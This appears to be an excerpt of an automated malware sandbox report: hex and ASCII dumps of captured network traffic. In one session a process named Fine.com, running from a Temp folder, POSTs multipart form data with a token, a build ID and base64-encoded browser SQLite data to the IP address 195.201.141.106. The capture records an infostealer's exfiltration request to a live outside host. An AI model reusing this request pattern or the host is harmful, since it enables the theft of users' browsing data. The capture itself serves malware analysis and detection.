                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                                                          Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                                                          Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                                                          Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                                                          Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                                                          Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                                                          Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                                                          Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                                                          Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          19192.168.2.550051195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC185OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 207993
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------JE3OP8YU3EKF3EU3OZ5PCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                                          Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
